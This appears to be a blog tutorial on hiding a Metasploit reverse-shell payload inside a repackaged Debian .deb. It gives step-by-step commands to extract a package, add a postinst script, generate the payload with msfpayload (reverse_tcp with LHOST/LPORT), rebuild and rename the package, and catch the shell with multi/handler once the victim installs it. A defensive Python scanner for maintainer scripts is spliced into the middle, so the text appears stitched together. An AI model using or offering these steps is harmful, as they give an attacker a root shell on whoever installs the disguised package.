Debian Package (Binary Linux Trojan)

This post covers Debian packages (*.deb): wrapping a payload into a .deb package so that,
when the victim installs the package, the attacker gets a command shell on the victim's computer.

Now create a directory named deb in the tmp directory

# mkdir /tmp/deb


Next, choose the deb package that we will wrap the payload into

# ls /var/cache/apt/archives/


Then copy the Debian package to the directory /tmp/deb

# cp /var/cache/apt/archives/package_name.deb /tmp/deb/




Next, extract the package into the work directory

# dpkg -x package_name.deb work



Then create a directory named DEBIAN and write a readable control record for the package.

# mkdir work/DEBIAN
# apt-cache show package_name | sed '/^Original-Maintainer/d' | sed '/^SHA/d' > /tmp/deb/work/DEBIAN/control



Now create a new bash script named postinst in the directory /tmp/deb/work/DEBIAN/,
so that the result looks like this:
# cat /tmp/deb/work/DEBIAN/postinst


Set the file permissions:
# chmod 755 /tmp/deb/work/DEBIAN/postinst


Now create the payload and embed it in the deb package
# msfpayload linux/x86/shell/reverse_tcp LHOST=IP-Address LPORT=4444 X > /tmp/deb/work/usr/bin/package_name


Now build the archive package from the /tmp/deb/work/ directory
# dpkg-deb --build /tmp/deb/work/


Once completed, it will produce a new package named work.deb

Now rename work.deb to the original package name:

# mv work.deb package_name.deb
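The step above relies on a maintainer script (postinst) that dpkg runs as root during installation, so a defender who receives a .deb from outside a trusted repository should look for such scripts before installing it. The following is an added example, not code from the original post: it parses the ar container of a .deb with the Python standard library only, lists any preinst/postinst/prerm/postrm found in control.tar.*, and builds two constructed test packages in memory to run against. It assumes a gz/xz/bz2-compressed control archive (zstd is not handled by tarfile).

```python
import io
import tarfile

MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}

def ar_members(deb):
    """Yield (name, data) for each member of an ar(1) archive such as a .deb."""
    if deb[:8] != b"!<arch>\n":
        raise ValueError("not an ar archive")
    pos = 8
    while pos + 60 <= len(deb):
        hdr = deb[pos:pos + 60]  # 16 name, 12 mtime, 6 uid, 6 gid, 8 mode, 10 size, 2 magic
        name = hdr[:16].decode().rstrip().rstrip("/")
        size = int(hdr[48:58].decode())
        yield name, deb[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)  # member data is padded to an even offset

def maintainer_scripts(deb):
    """Return the sorted maintainer script names found in control.tar.* (gz/xz/bz2)."""
    for name, data in ar_members(deb):
        if name.startswith("control.tar"):
            with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
                return sorted(m.name.lstrip("./") for m in tar.getmembers()
                              if m.isfile() and m.name.lstrip("./") in MAINTAINER_SCRIPTS)
    raise ValueError("no control.tar member found")

def _ar_member(name, data):
    hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode()
    return hdr + data + (b"\n" if len(data) % 2 else b"")

def build_deb(control_files):
    """Build a minimal .deb in memory; constructed test data with an empty data.tar."""
    def tgz(files):
        buf = io.BytesIO()
        with tarfile.open(fileobj=buf, mode="w:gz") as tar:
            for fname, content in files.items():
                info = tarfile.TarInfo("./" + fname)
                info.size = len(content)
                tar.addfile(info, io.BytesIO(content))
        return buf.getvalue()
    return (b"!<arch>\n" + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", tgz(control_files))
            + _ar_member("data.tar.gz", tgz({})))

CONTROL = b"Package: example\nVersion: 1.0\nArchitecture: all\nMaintainer: test\nDescription: constructed\n"
CLEAN = build_deb({"control": CONTROL})  # constructed sample without maintainer scripts
WITH_POSTINST = build_deb({"control": CONTROL, "postinst": b"#!/bin/sh\necho installed\n"})  # constructed

if __name__ == "__main__":
    print(maintainer_scripts(CLEAN), maintainer_scripts(WITH_POSTINST))
```

On a real file, pass `open("package.deb", "rb").read()` to `maintainer_scripts` and review any script it reports before running dpkg -i.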


The next stage is just to run the multi/handler and send the package to the target.

The following example shows what happens if the victim installs the package:



Then look back at the terminal console on your computer


Game Over

Regards
Hidemichi-Hiroyuki a.k.a [H2]